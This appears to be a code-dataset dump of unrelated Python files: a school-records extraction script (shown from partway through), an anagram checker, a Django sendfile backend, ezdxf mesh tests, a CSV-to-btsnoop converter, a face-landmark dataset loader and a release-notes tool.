''\r\n if (classStudent[\"LastName\"].strip().lower() !=\r\n family[\"parent1LastName\"].strip().lower()):\r\n studentLastNameIfDifferent1 = classStudent[\"LastName\"].strip()\r\n \r\n studentLastNameIfDifferent2 = ''\r\n if (family[\"parent2LastName\"] and\r\n family[\"parent2LastName\"].strip() != '' and\r\n classStudent[\"LastName\"].strip().lower() !=\r\n family[\"parent2LastName\"].strip().lower()):\r\n studentLastNameIfDifferent2 = classStudent[\"LastName\"].strip()\r\n \r\n cityStateZip = '\"' + \\\r\n camelCase(family[\"City\"].strip()) + \", \" + \\\r\n family[\"State\"] + \" \" + \\\r\n family[\"ZIP\"][0:5].strip() + '\"';\r\n \r\n facility = classDetailDict.get(\"Facility\", None);\r\n room = \"\"\r\n if facility:\r\n room = facility[\"Name\"].strip();\r\n else:\r\n logging.info('No room for class ' + aClassRecord[\"Name\"].strip())\r\n \r\n record = [classStudent[\"LastName\"].strip(),\r\n classStudent[\"FirstName\"].strip(),\r\n ('\"' + classStudent[\"LastName\"].strip() + ', ' +\r\n classStudent[\"FirstName\"].strip() + '\"'),\r\n formatClassName(aClassRecord[\"Name\"].strip(),\r\n teacherLastName.strip(),\r\n teacherFirstName.strip()),\r\n room,\r\n teacherLastName.strip(),\r\n teacherFirstName.strip(),\r\n ('\"' + teacherLastName.strip() + ', ' +\r\n teacherFirstName.strip() + '\"'),\r\n createStudentEmailAddress(classStudent[\"FirstName\"].strip(), \r\n classStudent[\"LastName\"].strip()),\r\n familyCode,\r\n studentCode,\r\n incrString(studentCode),\r\n nikolaus,\r\n family[\"parent1LastName\"],\r\n family[\"parent1FirstName\"],\r\n family[\"parent2LastName\"],\r\n family[\"parent2FirstName\"],\r\n '\"' + family[\"Name\"].strip() + '\"',\r\n studentLastNameIfDifferent1,\r\n studentLastNameIfDifferent2,\r\n family[\"primaryEmail\"].strip(),\r\n family[\"secondaryEmail\"].strip(),\r\n family[\"tertiaryEmail\"].strip(),\r\n getAddress(family), \r\n cityStateZip]\r\n \r\n # array of dictionary records\r\n record2 = {}\r\n record2[\"LastName\"] = classStudent[\"LastName\"]\r\n record2[\"FirstName\"] = classStudent[\"FirstName\"]\r\n record2[\"parent1LastName\"] = family[\"parent1LastName\"]\r\n record2[\"parent1FirstName\"] = family[\"parent1FirstName\"]\r\n record2[\"parent2LastName\"] = family[\"parent2LastName\"]\r\n record2[\"parent2FirstName\"] = family[\"parent2FirstName\"]\r\n record2[\"primaryEmail\"] = family[\"primaryEmail\"]\r\n record2[\"secondaryEmail\"] = family[\"secondaryEmail\"]\r\n record2[\"tertiaryEmail\"] = family[\"tertiaryEmail\"]\r\n record2[\"PrimaryTeacher\"] = aClassRecord[\"PrimaryTeacher\"]\r\n record2[\"HomeroomTeacher\"] = classStudent[\"HomeroomTeacher\"]\r\n\r\n \r\n \r\n \r\n except TypeError: \r\n logging.exception(\"Incorrect family record for code {0} and student {1} {2}\"\r\n .format(familyCode, \r\n classStudent[\"FirstName\"],\r\n classStudent[\"LastName\"]));\r\n record = [];\r\n finally:\r\n if len(record) == 0:\r\n return (\"\", {});\r\n return (\",\".join(record), record2)\r\n\r\ndef validateClassDetails(classes):\r\n for aClassRecord in classes:\r\n teacherFullName = aClassRecord[\"PrimaryTeacher\"]\r\n # Report Missing Teacher details\r\n if (not teacherFullName.strip()):\r\n logging.warning('Warning: Missing teacher name in record for class {0}'\r\n .format(aClassRecord[\"Name\"]))\r\n \r\ndef saveRecords(allRecords):\r\n for record in allRecords:\r\n print (record)\r\n\r\n\r\n# Want LastName, FirstName, Class, Room, Teacher LastName, Teacher FirstName, \r\n# FamilyId, ParentName, Primary Parent Name, VolunteerAssignment, Address, 
\r\n# From Classes record, get Room(Section), Class(Description),\r\n# TeacherName(PrimaryTeacher), ClassID for each ClassID\r\n\r\n# In /Family//Contacts I will get email addresses of both mother and father\r\n# Use token here.\r\ndef extractRecords(schoolId, token):\r\n try:\r\n familyDict = getFamilyDict(MAIN_URL, schoolId, token)\r\n classesDict = getClassDict(MAIN_URL, schoolId, token)\r\n \r\n allRecords=[];\r\n allRecords.append(createRecordHeader())\r\n dictRecordArray = []\r\n for aClassRecord in classesDict[\"Period\"]:\r\n # clean name of record\r\n aClassRecord[\"Name\"] = aClassRecord[\"Name\"].replace(\"\\\\\",\"\")\r\n logging.debug((\"Class Name = {}, Class Room = {}, Class ID = {}\"\r\n .format(aClassRecord[\"Name\"], aClassRecord[\"Section\"],\r\n aClassRecord[\"ID\"])))\r\n try:\r\n classDetailUrl = MAIN_URL + '/School/'+ str(schoolId) +'/Classes/' + str(aClassRecord[\"ID\"]) \r\n classDetailDict = retrieve(classDetailUrl, token)\r\n classStudentsInfoDict = dict()\r\n classInfoUrl = MAIN_URL + '/Class/' + str(aClassRecord[\"ID\"]) + '/Directory'\r\n classStudentsInfoDict = retrieve(classInfoUrl, token)\r\n logging.info('Retrieved {0} student records in class {1}'\r\n .format(str(len(classStudentsInfoDict)), aClassRecord[\"Name\"]))\r\n logging.debug(classStudentsInfoDict)\r\n \r\n \r\n \r\n # create records for all students\r\n detailedStudentInfoDict = []\r\n for classStudent in classStudentsInfoDict:\r\n studentID = classStudent[\"ID\"].strip()\r\n studentStatistcssUrl = MAIN_URL + '/Student/' + str(studentID) + '/Statistics/' + '9255'\r\n stat = retrieve(studentStatistcssUrl, token)\r\n logging.debug('Found {0} stat for student {1}.'.format(stat[\"Value\"], classStudent[\"Code\"]))\r\n \r\n studentInfoUrl = MAIN_URL + '/Student/' + str(studentID)\r\n detailedStudentInfo = retrieve(studentInfoUrl, token)\r\n detailedStudentInfoDict.append(detailedStudentInfo)\r\n \r\n for detailedStudentInfo in detailedStudentInfoDict:\r\n [r, dictRecord] = createRecord(aClassRecord, classDetailDict, detailedStudentInfo, stat[\"Value\"], familyDict);\r\n if len(r)>0:\r\n allRecords.append(r);\r\n dictRecordArray.append(dictRecord)\r\n \r\n except RestError as e:\r\n msg = \"REST API error when retrieving {0} student records \" + \\\r\n \"in class {1} with message {2}\" \\\r\n .format(str(len(classStudentsInfoDict)), aClassRecord[\"Name\"],\r\n str(e));\r\n logging.debug(msg);\r\n logging.warning('No student records available for class {0}'.format(aClassRecord[\"Name\"]));\r\n \r\n saveRecords(allRecords)\r\n except Exception as ex:\r\n msg = \"Connection failed: {0}\".format(ex);\r\n logging.exception(msg);\r\n\r\ndef parseArguments():\r\n parser = argparse.ArgumentParser(description='Extract Family and School Data')\r\n parser.add_argument('--school', dest='schoolId', action='store',\r\n type=int, required=True, help='Sycamore school ID.')\r\n parser.add_argument('--token', dest='securityToken', action='store',\r\n required=True, help='Sycamore security token.')\r\n args = parser.parse_args()\r\n return (args.schoolId, args.securityToken)\r\n\r\nif __name__ == \"__main__\" :\r\n logging.basicConfig(level=logging.INFO)\r\n args = parseArguments()\r\n extractRecords(args[0], args[1])\r\n","repo_name":"it-gssb/sycamore","sub_path":"src/extract/SycamoreExtract.py","file_name":"SycamoreExtract.py","file_ext":"py","file_size_in_byte":18681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5144386873","text":"\"\"\"\nGiven two 
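The SycamoreExtract.py record above derives a `LingcoPwd` by "incrementing" every character of the student code via `incrChar`/`incrString`; note that `incrChar`'s first assignment is dead, since every branch overwrites `n`. A self-contained re-implementation with the same wrapping rules, for reference:

```python
# Standalone sketch of the character increment used for LingcoPwd above:
# step each character forward, wrapping z->a, Z->A, 9->0 and '-'->'~'.
def incr_char(c: str) -> str:
    wrap = {'z': 'a', 'Z': 'A', '9': '0', '-': '~'}
    return wrap.get(c, chr(ord(c) + 1))

def incr_string(s: str) -> str:
    return "".join(incr_char(c) for c in s)

assert incr_string("abz19") == "bca20"
```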
strings s1 and s2, check if they're\nanagrams. Two strings are anagrams if they're\nmade of the same characters with the same frequencies. \n\"\"\"\nfrom collections import Counter\n\n\ndef are_anagrams1(s1, s2):\n if len(s1) != len(s2):\n return False\n freq1 = {}\n freq2 = {}\n for ch in s1:\n if ch in freq1:\n freq1[ch] += 1\n else:\n freq1[ch] = 1\n for ch in s2:\n if ch in freq2:\n freq2[ch] += 1\n else:\n freq2[ch] = 1\n for key in freq1:\n if key not in freq2 or freq1[key] != freq2[key]:\n return False\n return True\n# T(n) = O(n)\n# S(n) = O(n)\n\n\ndef are_anagrams2(s1, s2):\n if len(s1) != len(s2):\n return False\n return Counter(s1) == Counter(s2)\n# T(n) = O(n)\n# S(n) = O(n)\n\n\ndef are_anagrams3(s1, s2):\n if len(s1) != len(s2):\n return False\n return sorted(s1) == sorted(s2)\n# T(n) = O(nlogn)\n# S(n) = O(n)\n\n\nstr1 = \"nameless\"\nstr2 = \"salesman\"\nr1 = are_anagrams1(str1, str2)\nr2 = are_anagrams2(str1, str2)\nprint(r1)\nprint(r2)\n","repo_name":"pushpa66/Learn-data-structures-and-algorithms-in-python","sub_path":"Coding Problems/Q1ValidAnagram.py","file_name":"Q1ValidAnagram.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25868655283","text":"from django.http import HttpResponse\n\nfrom django.conf import settings\nimport os.path\n\ndef _convert_file_to_url(filename):\n # CURRENTLY NOT WORKING\n # mod_wsgi wants a relative URL not a filename\n # so apache does an internal redirect\n\n relpath = os.path.relpath(filename, settings.SENDFILE_ROOT)\n \n url = [settings.SENDFILE_URL]\n\n while relpath:\n relpath, head = os.path.split(relpath)\n url.insert(1, head)\n\n return u''.join(url)\n\ndef sendfile(request, filename, **kwargs):\n response = HttpResponse()\n response['Location'] = _convert_file_to_url(filename)\n # need to destroy get_host() to stop django\n # rewriting our location to include http, so that\n # mod_wsgi is able to do the internal redirect\n request.get_host = lambda: ''\n\n return response\n\n","repo_name":"ranjithtenz/cujo","sub_path":"3rd_party_apps/sendfile/backends/mod_wsgi.py","file_name":"mod_wsgi.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"70791197608","text":"import pytest\nfrom math import radians\nimport ezdxf\nfrom ezdxf.math import Vector, BoundingBox\nfrom ezdxf.render.forms import cube\nfrom ezdxf.render.mesh import MeshVertexMerger, MeshBuilder, MeshTransformer, MeshAverageVertexMerger\nfrom ezdxf.addons import SierpinskyPyramid\n\n\ndef test_vertex_merger_indices():\n merger = MeshVertexMerger()\n indices = merger.add_vertices([(1, 2, 3), (4, 5, 6)])\n indices2 = merger.add_vertices([(1, 2, 3), (4, 5, 6)])\n assert indices == indices2\n\n\ndef test_vertex_merger_vertices():\n merger = MeshVertexMerger()\n merger.add_vertices([(1, 2, 3), (4, 5, 6)])\n merger.add_vertices([(1, 2, 3), (4, 5, 6)])\n assert merger.vertices == [(1, 2, 3), (4, 5, 6)]\n\n\ndef test_vertex_merger_index_of():\n merger = MeshVertexMerger()\n merger.add_vertices([(1, 2, 3), (4, 5, 6)])\n assert merger.index((1, 2, 3)) == 0\n assert merger.index((4, 5, 6)) == 1\n with pytest.raises(IndexError):\n merger.index((7, 8, 9))\n\n\ndef test_average_vertex_merger_indices():\n merger = MeshAverageVertexMerger()\n indices = merger.add_vertices([(1, 2, 3), (4, 5, 6)])\n indices2 = merger.add_vertices([(1, 2, 3), (4, 5, 6)])\n assert indices == 
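The anagram record above compares a hand-rolled frequency map, `collections.Counter`, and sorting; the first two run in O(n) while sorting costs O(n log n). A self-contained agreement check over sample inputs, with the two library-based variants inlined so the snippet runs on its own:

```python
# Agreement check for the anagram strategies above; inputs include the
# unequal-length early-return case and a same-length non-anagram.
from collections import Counter

def by_counter(s1, s2):
    return len(s1) == len(s2) and Counter(s1) == Counter(s2)

def by_sorting(s1, s2):
    return len(s1) == len(s2) and sorted(s1) == sorted(s2)

cases = [("nameless", "salesman", True), ("ab", "abc", False), ("aabb", "abbb", False)]
for s1, s2, expected in cases:
    assert by_counter(s1, s2) == by_sorting(s1, s2) == expected
```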
indices2\n\n\ndef test_average_vertex_merger_vertices():\n merger = MeshAverageVertexMerger()\n merger.add_vertices([(1, 2, 3), (4, 5, 6)])\n merger.add_vertices([(1, 2, 3), (4, 5, 6)])\n assert merger.vertices == [(1, 2, 3), (4, 5, 6)]\n\n\ndef test_average_vertex_merger_index_of():\n merger = MeshAverageVertexMerger()\n merger.add_vertices([(1, 2, 3), (4, 5, 6)])\n assert merger.index((1, 2, 3)) == 0\n assert merger.index((4, 5, 6)) == 1\n with pytest.raises(IndexError):\n merger.index((7, 8, 9))\n\n\ndef test_mesh_builder():\n dwg = ezdxf.new('R2000')\n pyramid = SierpinskyPyramid(level=4, sides=3)\n pyramid.render(dwg.modelspace(), merge=False)\n meshes = dwg.modelspace().query('MESH')\n assert len(meshes) == 256\n\n\ndef test_vertex_merger():\n pyramid = SierpinskyPyramid(level=4, sides=3)\n faces = pyramid.faces()\n mesh = MeshVertexMerger()\n for vertices in pyramid:\n mesh.add_mesh(vertices=vertices, faces=faces)\n assert len(mesh.vertices) == 514\n assert len(mesh.faces) == 1024\n\n\ndef test_average_vertex_merger():\n pyramid = SierpinskyPyramid(level=4, sides=3)\n faces = pyramid.faces()\n mesh = MeshAverageVertexMerger()\n for vertices in pyramid:\n mesh.add_mesh(vertices=vertices, faces=faces)\n assert len(mesh.vertices) == 514\n assert len(mesh.faces) == 1024\n\n\nREGULAR_FACE = Vector.list([(0, 0, 0), (1, 0, 1), (1, 1, 1), (0, 1, 0)])\nIRREGULAR_FACE = Vector.list([(0, 0, 0), (1, 0, 1), (1, 1, 0), (0, 1, 0)])\n\n\ndef test_has_none_planar_faces():\n mesh = MeshBuilder()\n mesh.add_face(REGULAR_FACE)\n assert mesh.has_none_planar_faces() is False\n mesh.add_face(IRREGULAR_FACE)\n assert mesh.has_none_planar_faces() is True\n\n\ndef test_scale_mesh():\n mesh = cube(center=False)\n mesh.scale(2, 3, 4)\n bbox = BoundingBox(mesh.vertices)\n assert bbox.extmin.isclose((0, 0, 0))\n assert bbox.extmax.isclose((2, 3, 4))\n\n\ndef test_rotate_x():\n mesh = cube(center=False)\n mesh.rotate_x(radians(90))\n bbox = BoundingBox(mesh.vertices)\n assert bbox.extmin.isclose((0, -1, 0))\n assert bbox.extmax.isclose((1, 0, 1))\n\n\n@pytest.fixture(scope='module')\ndef msp():\n doc = ezdxf.new()\n return doc.modelspace()\n\n\n@pytest.fixture(scope='module')\ndef cube_polyface(msp):\n p = msp.add_polyface()\n p.append_faces(cube().faces_as_vertices())\n return p\n\n\ndef test_from_empty_polyface(msp):\n empty_polyface = msp.add_polyface()\n b = MeshBuilder.from_polyface(empty_polyface)\n assert len(b.vertices) == 0\n assert len(b.faces) == 0\n\n\ndef test_from_cube_polyface(cube_polyface):\n b = MeshBuilder.from_polyface(cube_polyface)\n assert len(b.vertices) == 24 # unoptimized mesh builder\n assert len(b.faces) == 6\n\n\ndef test_render_polyface(cube_polyface):\n doc = ezdxf.new()\n msp = doc.modelspace()\n t = MeshTransformer.from_polyface(cube_polyface)\n assert len(t.vertices) == 24 # unoptimized mesh builder\n assert len(t.faces) == 6\n t.render_polyface(msp)\n new_polyface = msp[-1]\n assert new_polyface.dxftype() == 'POLYLINE'\n assert new_polyface.is_poly_face_mesh is True\n assert len(new_polyface.vertices) == 8 + 6\n assert new_polyface.vertices[0] is not cube_polyface.vertices[0]\n\n\ndef test_from_polymesh(msp):\n polymesh = msp.add_polymesh(size=(4, 4))\n b = MeshBuilder.from_polyface(polymesh)\n n = polymesh.dxf.n_count\n m = polymesh.dxf.m_count\n nfaces = (n - 1) * (m - 1)\n assert len(b.vertices) == nfaces * 4 # unoptimized mesh builder\n assert len(b.faces) == nfaces\n\n\ndef test_from_polyface_type_error(msp):\n polyline = msp.add_polyline3d([(0, 0, 0), (1, 0, 0)])\n with 
pytest.raises(TypeError):\n MeshBuilder.from_polyface(polyline)\n\n line = msp.add_line(start=(0, 0, 0), end=(1, 0, 0))\n with pytest.raises(TypeError):\n MeshBuilder.from_polyface(line)\n","repo_name":"DatacloudIntl/dc_ezdxf","sub_path":"tests/test_07_render/test_703_render_mesh.py","file_name":"test_703_render_mesh.py","file_ext":"py","file_size_in_byte":5067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4095851771","text":"import csv\nimport sys\nfrom datetime import datetime\nimport struct\nimport os\n\nhelp = \"\"\"\nusage: python [csv input] [btsnoop output]\n\"\"\"\n\nclass BTSNOOP():\n \n def __init__(self):\n self.packet_records = []\n\n def __pack(self, size, val):\n pass\n\n def save_packet(self, time_stamp_us, direction_h_c, data_array):\n\n # Original Length\n Original_Length = 4 + len(data_array) + 4 + 4 + 8\n\n # Included Length\n Included_Length = len(data_array)\n\n # Packet Flags\n Packet_Flags = 0\n if direction_h_c == \"C->H\":\n Packet_Flags = 1\n \n if data_array[0] == 0x01 or data_array[0] == 0x04:\n Packet_Flags |= 1<<1\n\n # Cumulative Drops\n Cumulative_Drops = 0\n\n # Timestamp Microseconds\n byte_s = struct.pack(\">IIIIQ\", Original_Length, Included_Length, Packet_Flags, Cumulative_Drops, time_stamp_us)\n packet_record = list(byte_s)\n\n # Packet Data\n packet_record += data_array\n\n self.packet_records.append(packet_record)\n\n def save_to_file(self, file_path):\n file = open(file_path, 'wb+')\n\n # write btsnoop header\n file.write(bytes([0x62,0x74,0x73,0x6E,0x6F,0x6F,0x70,0x00])) #Identification Pattern\n file.write(bytes([0x00,0x00,0x00,0x01])) #Version Number\n file.write(bytes([0x00,0x00,0x03,0xEA])) #Datalink Type: 1002 - HCI UART (H4)\n\n # write all packet records\n for record in self.packet_records:\n file.write(bytes(record))\n\n # save\n file.close()\n\ndef get_time_stamp(iso_8601_str):\n # 2022-07-02T13:03:04.042449200+00:00\n time_str_a = iso_8601_str[:26]\n time_str_b = iso_8601_str[29:]\n\n time_str_s = time_str_a + time_str_b\n d = datetime.strptime(time_str_s, \"%Y-%m-%dT%H:%M:%S.%f%z\")\n\n time_stamp_us = int(d.timestamp() * 1000 * 1000) + 0x00dcddb30f2f8000 # add 1970 years with us unit.\n\n return time_stamp_us\n \n\nif __name__ == \"__main__\":\n # get args\n args = sys.argv[1:]\n\n if len(args) == 1:\n input_csv_path = args[0]\n output_btsnoop_path = input_csv_path[:-4] + '.log'\n elif len(args) == 2:\n input_csv_path = args[0]\n output_btsnoop_path = args[1]\n else:\n print(help)\n sys.exit()\n\n if not os.path.exists(input_csv_path):\n print(\"input path not exist!\")\n sys.exit()\n \n if os.path.exists(output_btsnoop_path):\n print(\"input path already exist!\")\n sys.exit()\n\n input_csv = open(input_csv_path, 'r')\n\n csv = csv.DictReader(input_csv)\n\n btsnoop = BTSNOOP()\n\n for row in csv:\n # time stamp\n time_stemp_us = get_time_stamp(row['start_time'])\n\n # data directions\n direction_h_c = row['data'][:4]\n if row['data'][:4] == \"H->C\":\n pass\n elif row['data'][:4] == \"C->H\":\n pass\n else:\n raise \"Data not 'H->C' or 'C->H'!\"\n sys.exit()\n \n # data\n data_str = row['data'][5:].split(' ')\n data_array = [int(x, 16) for x in data_str]\n\n btsnoop.save_packet(time_stemp_us, direction_h_c, data_array)\n\n 
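The ezdxf test record above exercises `MeshVertexMerger`, whose point is that vertices shared between faces are stored once (the tests show the unoptimized `MeshBuilder` keeping 24 vertices for a cube instead of 8). A small sketch of that deduplication, assuming ezdxf is installed; the calls mirror those in the tests:

```python
# Two quad faces sharing an edge: MeshVertexMerger stores the two shared
# corners once, so 8 submitted vertices collapse to 6 unique ones.
from ezdxf.render.mesh import MeshVertexMerger

mesh = MeshVertexMerger()
mesh.add_face([(0, 0, 0), (1, 0, 0), (1, 1, 0), (0, 1, 0)])
mesh.add_face([(1, 0, 0), (2, 0, 0), (2, 1, 0), (1, 1, 0)])
assert len(mesh.vertices) == 6
assert len(mesh.faces) == 2
```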
btsnoop.save_to_file(output_btsnoop_path)\n\n\n\n","repo_name":"AnChangNice/Logic2_HCI_UART_Extension","sub_path":"csv2btsnoop.py","file_name":"csv2btsnoop.py","file_ext":"py","file_size_in_byte":3215,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"30623935099","text":"from torch.utils.data import Dataset\nfrom PIL import Image\nimport numpy as np\nimport os\nimport pickle\nimport matplotlib.pyplot as plt\nimport torchvision.transforms.functional as TF\nimport random\nimport torch\n\nclass FaceDataset(Dataset):\n def __init__(self, prefix, transform, coordinate_transform=None, do_train=True) -> None:\n super().__init__()\n self.prefix = prefix\n self.transform = transform\n self.coordinate_transform = coordinate_transform\n self.landmarks = None\n if do_train:\n with open(os.path.join(self.prefix, 'annot.pkl'), 'rb') as f:\n self.imgs, self.landmarks = pickle.load(f)\n self.landmarks = np.array(self.landmarks)\n else:\n self.imgs = os.listdir(self.prefix)\n\n def __len__(self):\n return len(self.imgs)\n\n def __getitem__(self, index):\n img = self.transform(Image.open(os.path.join(self.prefix, self.imgs[index])).convert(\"RGB\"))\n C, H, W = img.shape\n if self.landmarks is not None:\n norm_landmarks = np.stack((self.landmarks[index, :, 0] / W, self.landmarks[index, :, 1] / H), axis=1)\n if self.coordinate_transform is not None:\n return self.coordinate_transform((img, norm_landmarks))\n else:\n return img, norm_landmarks\n else:\n return self.imgs[index], img\n\ndef show_landmarks(image, landmarks, img_name='./landmarks.png'):\n C, H, W = image.shape\n plt.figure()\n plt.imshow(image.permute(1, 2, 0))\n plt.scatter(landmarks[:, 0] * W, landmarks[:, 1] * H, s=10, marker='.', c='r')\n plt.savefig(img_name)\n\nclass RandomFlip(object): \n def __init__(self, probability=0.5):\n assert 0 <= probability <= 1\n self.prob = probability \n\n def __call__(self, sample):\n image, landmarks = sample\n if self.prob > random.random():\n lm = landmarks.copy()\n lm[:, 0] = 1 - lm[:, 0]\n return TF.hflip(image), lm\n else:\n return image, landmarks\n\nclass RandomRotate(object): \n def __init__(self, degree=0):\n assert degree >= 0\n self.degree = degree\n\n def __call__(self, sample):\n image, landmarks = sample\n c, h, w = image.shape\n deg = random.uniform(-self.degree, self.degree)\n rad = np.deg2rad(deg)\n rotation_matrix = np.array([\n [np.cos(rad), -np.sin(rad)],\n [np.sin(rad), np.cos(rad)]\n ])\n trans_cor = ((landmarks - 0.5) @ rotation_matrix.T) + 0.5\n if np.any(trans_cor < 0) or np.any(trans_cor > 1):\n return image, landmarks\n else:\n return TF.rotate(image, -deg), trans_cor\n\nclass RandomMask(object): \n def __init__(self, ratio=0):\n assert 0 <= ratio <= 1\n self.ratio = ratio\n\n def __call__(self, image):\n c, h, w = image.shape\n mask_left = random.randrange(w - 1)\n mask_top = random.randrange(h - 1)\n mask_h = int(random.uniform(0, self.ratio) * h)\n mask_w = int(random.uniform(0, self.ratio) * w)\n if mask_h == 0 or mask_w == 0:\n return image\n mask_right = min(w - 1, mask_left + mask_w)\n mask_bottom = min(h - 1, mask_top + mask_h)\n img = image.clone()\n img[:, mask_top:mask_bottom, mask_left:mask_right] = torch.zeros(c, mask_bottom - mask_top, mask_right - mask_left)\n return img\n \n\nif __name__ == \"__main__\":\n from torchvision import transforms\n faces = FaceDataset(\"./data/aflw_val/\", transforms.Compose([\n transforms.ColorJitter(0.2, 0.2, 0.2),\n transforms.GaussianBlur(3),\n transforms.ToTensor(), \n 
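The csv2btsnoop record above packs each packet record as four big-endian uint32 fields plus a uint64 timestamp (`struct.pack(">IIIIQ", ...)`), with flag bit 0 meaning controller-to-host and bit 1 meaning command/event. A round-trip sketch of that layout; the example payload is an assumption chosen for illustration:

```python
# Round-trip sketch of the btsnoop record header written above: format
# ">IIIIQ" = original length, included length, flags, drops, timestamp.
import struct

payload = bytes([0x01, 0x03, 0x0C, 0x00])  # e.g. an HCI Reset command (H->C)
orig_len = 4 + len(payload) + 4 + 4 + 8    # mirrors the script's computation
flags = 0b10                               # bit0=0: H->C, bit1=1: command/event
epoch_offset = 0x00DCDDB30F2F8000          # 1970-01-01 in btsnoop's year-0 epoch
header = struct.pack(">IIIIQ", orig_len, len(payload), flags, 0, epoch_offset)
assert struct.unpack(">IIIIQ", header) == (orig_len, len(payload), flags, 0, epoch_offset)
```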
RandomMask(0.2)\n ]), transforms.Compose([\n RandomFlip(), \n RandomRotate(15)\n ]))\n for i in range(10):\n img, lm = faces[50+i]\n show_landmarks(img, lm, f\"./tmp/{i}.png\")","repo_name":"zqyuan-tw/Light_Weight_Facial_Landmark_Prediction","sub_path":"face.py","file_name":"face.py","file_ext":"py","file_size_in_byte":3934,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13988724933","text":"\"\"\"Release notes runner class\"\"\"\nimport os\nimport os.path\nimport re\nimport shutil\nimport subprocess\nimport logging\nimport sys\nimport time\nfrom collections import defaultdict\nfrom datetime import datetime\n\nimport yaml.representer\n\nyaml.add_representer(defaultdict, yaml.representer.Representer.represent_dict)\n\n\nclass Msg:\n \"\"\"Collection of configurable user facing message ids.\"\"\"\n\n NEED_NOTE = \"need-note\"\n NEED_TARGET = \"need-target\"\n\n\nDEFAULT_CONFIG = {\n \"encoding\": \"utf8\",\n \"earliest_version\": \"0.0.1\",\n \"notes_dir\": \"./releasenotes\",\n \"release_tag_re\": r\"^v?((?:[\\d.ab]|rc)+)\",\n \"sections\": [\n [\"features\", \"New Features\"],\n [\"internal\", \"Internal Changes\"],\n ],\n \"messages\": {\n Msg.NEED_NOTE: \"Please create a release note for this branch.\",\n Msg.NEED_TARGET: \"No upstream configured or detected, use --target .\",\n },\n \"prelude_section_name\": \"release_summary\",\n \"template\": \"# Release notes template.\\n\"\n \"release_summary: >\\n\"\n \" Replace this text with content to appear at the\\n\"\n \" top of the section for this release.\\n\"\n \"features:\\n\"\n \" - List new features here, or remove this section.\\n\",\n}\n\nlog = logging.getLogger(\"rnotes\")\n\n\nCONFIG_PATH = \"./rnotes.yaml\"\n\n\ndef normalize(git_dir):\n \"\"\"Normalize to forward slash, strip off ./ from the front.\"\"\"\n return git_dir.replace(\"\\\\\", \"/\").replace(\"./\", \"\")\n\n\nclass Runner: # pylint: disable=too-many-instance-attributes\n \"\"\"Process rnotes command line args.\"\"\"\n\n def __init__(self, args):\n self.args = args\n try:\n with open(CONFIG_PATH, encoding=\"utf8\") as fh:\n self.cfg = yaml.safe_load(fh)\n except FileNotFoundError:\n self.cfg = DEFAULT_CONFIG.copy()\n\n self.prelude_name = self.cfg.get(\"prelude_section_name\", \"release_summary\")\n self.earliest = self.cfg.get(\"earliest_version\")\n self.version_regex = (\n args.version_regex\n or self.cfg.get(\"release_tag_re\")\n or DEFAULT_CONFIG.get(\"release_tag_re\")\n )\n self.tags = []\n self.logs = []\n self.notes = {}\n self.report = \"\"\n self.ver_start = self.args.previous\n self.ver_end = self.args.version or \"HEAD\"\n notes_dir = self.args.notes_dir or self.cfg.get(\n \"notes_dir\", DEFAULT_CONFIG.get(\"notes_dir\")\n )\n self.notes_dir = normalize(notes_dir)\n\n log.debug(\"notes_dir: %s\", self.notes_dir)\n if not os.path.exists(self.notes_dir):\n raise FileNotFoundError(\"expected folder: %s\" % self.notes_dir)\n\n self.sections = dict(self.cfg.get(\"sections\", {}))\n self.valid_sections = {self.prelude_name, *self.sections.keys()}\n\n self.__git = shutil.which(\"git\")\n\n def git(self, *args):\n \"\"\"Shell git with args.\"\"\"\n log.debug(\"+ git %s\", \" \".join(args))\n cmd = [self.__git] + list(args)\n ret = subprocess.run(cmd, check=True, stdout=subprocess.PIPE, encoding=\"utf8\")\n return ret.stdout\n\n def get_tags(self):\n \"\"\"Get release tags, reverse sorted.\"\"\"\n self.tags = []\n\n for tag in self.git(\"log\", self.ver_end, \"--tags\", 
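The face.py record above keeps landmarks normalized to [0, 1], so `RandomFlip` maps x to 1 - x and `RandomRotate` rotates coordinates about the image center (0.5, 0.5), rejecting any rotation that pushes a landmark out of range. A numeric check of that coordinate math:

```python
# Numeric check of the normalized-landmark transforms above: horizontal
# flip is x -> 1 - x; rotation is applied about the center (0.5, 0.5).
import numpy as np

lm = np.array([[0.25, 0.40]])

flipped = lm.copy()
flipped[:, 0] = 1 - flipped[:, 0]
assert np.allclose(flipped, [[0.75, 0.40]])

rad = np.deg2rad(90)
R = np.array([[np.cos(rad), -np.sin(rad)],
              [np.sin(rad),  np.cos(rad)]])
rotated = (lm - 0.5) @ R.T + 0.5
assert np.allclose(rotated, [[0.60, 0.25]])
```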
\"--pretty=%D\").split(\"\\n\"):\n tag = tag.strip()\n if not tag:\n continue\n head = re.match(r\"HEAD[^,]*, tag:\", tag)\n tag = re.search(r\"\\btag: ([^\\s,]+)\", tag)\n if not tag:\n continue\n tag = tag[1]\n if re.match(self.version_regex, tag):\n self.tags.append(tag)\n if head:\n self.ver_end = tag\n if tag == self.earliest:\n break\n\n self.tags = list(reversed(self.tags))\n\n log.debug(\"tags: %s\", self.tags)\n\n def get_start_from_end(self):\n \"\"\"If start not specified, assume previous release.\"\"\"\n if not self.ver_start:\n if self.ver_end == \"HEAD\":\n self.ver_start = self.tags[-1] if self.tags else \"HEAD\"\n\n prev = None\n for t in self.tags:\n if self.ver_end == t:\n self.ver_start = prev\n prev = t\n\n log.debug(\"prev: %s, cur: %s\", self.ver_start, self.ver_end)\n\n def get_logs(self):\n \"\"\"Get a list of logs with tag, hash and ct.\"\"\"\n cur_tag = self.ver_end\n ct = 0\n cname = \"\"\n hsh = \"\"\n if self.ver_start == \"TAIL\" or not self.ver_start:\n vers = self.ver_end\n else:\n vers = self.ver_start + \"..\" + self.ver_end\n for ent in self.git(\n \"log\", vers, \"--name-only\", \"--format=%D^%ct^%cn^%h\", \"--diff-filter=A\"\n ).split(\"\\n\"):\n ent 